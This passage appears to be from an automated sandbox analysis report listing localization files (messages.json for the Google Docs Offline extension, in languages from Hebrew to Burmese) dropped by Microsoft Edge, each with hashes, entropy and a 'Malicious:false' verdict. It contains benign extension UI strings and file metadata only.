                                                                                                                                          Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\ja\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1160
                                                                                                                                          Entropy (8bit):5.292894989863142
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                          MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                          SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                          SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                          SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\ka\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):3264
                                                                                                                                          Entropy (8bit):3.586016059431306
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                          MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                          SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                          SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                          SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\kk\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):3235
                                                                                                                                          Entropy (8bit):3.6081439490236464
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                          MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                          SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                          SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                          SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\km\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):3122
                                                                                                                                          Entropy (8bit):3.891443295908904
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                          MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                          SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                          SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                          SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\kn\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1880
                                                                                                                                          Entropy (8bit):4.295185867329351
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/UGG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZZ
                                                                                                                                          MD5:8E16966E815C3C274EEB8492B1EA6648
                                                                                                                                          SHA1:7482ED9F1C9FD9F6F9BA91AB15921B19F64C9687
                                                                                                                                          SHA-256:418FF53FCA505D54268413C796E4DF80E947A09F399AB222A90B81E93113D5B5
                                                                                                                                          SHA-512:85B28202E874B1CF45B37BA05B87B3D8D6FE38E89C6011C4240CF6B563EA6DA60181D712CCE20D07C364F4A266A4EC90C4934CC8B7BB2013CB3B22D755796E38
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\ko\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1042
                                                                                                                                          Entropy (8bit):5.3945675025513955
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                          MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                          SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                          SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                          SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\lo\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2535
                                                                                                                                          Entropy (8bit):3.8479764584971368
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                          MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                          SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                          SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                          SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\lt\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1028
                                                                                                                                          Entropy (8bit):4.797571191712988
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                          MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                          SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                          SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                          SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\lv\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):994
                                                                                                                                          Entropy (8bit):4.700308832360794
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                          MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                          SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                          SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                          SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\ml\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2091
                                                                                                                                          Entropy (8bit):4.358252286391144
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                          MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                          SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                          SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                          SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\mn\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2778
                                                                                                                                          Entropy (8bit):3.595196082412897
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                          MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                          SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                          SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                          SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\mr\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1719
                                                                                                                                          Entropy (8bit):4.287702203591075
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                          MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                          SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                          SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                          SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\ms\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):936
                                                                                                                                          Entropy (8bit):4.457879437756106
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                          MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                          SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                          SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                          SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\my\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):3830
                                                                                                                                          Entropy (8bit):3.5483353063347587
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                          MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                          SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                          SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                          SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                          Malicious:false
